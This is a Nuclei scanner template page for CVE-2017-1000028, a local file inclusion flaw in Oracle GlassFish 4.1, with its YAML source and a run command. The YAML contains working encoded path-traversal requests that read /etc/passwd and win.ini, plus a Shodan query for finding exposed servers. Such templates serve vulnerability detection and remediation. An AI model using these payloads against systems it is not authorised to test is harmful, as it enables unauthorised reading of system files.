Skip to content
Nuclei Templates

Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion

ID: CVE-2017-1000028

Severity: high

Author: pikpikcu,daffainfo

Tags: cve,cve2017,oracle,glassfish,lfi,edb

Description

Section titled “Description”

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.

YAML Source

Section titled “YAML Source”
id: CVE-2017-1000028


info:
  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.exploit-db.com/exploits/45196
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    - https://www.exploit-db.com/exploits/45196/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000028
    cwe-id: CWE-22
    epss-score: 0.97516
    epss-percentile: 0.99986
    cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,oracle,glassfish,lfi,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
      - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"


    stop-at-first-match: true


    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and


      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100c81d753dce1c23e76f05a5ae87391ad797f6f285f7e64cd711100340de38986902206d8c71839cc01500b28f2a427528b1a4e118e4fee29c650ae96b9ceef7790d7f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-1000028.yaml"

View on Github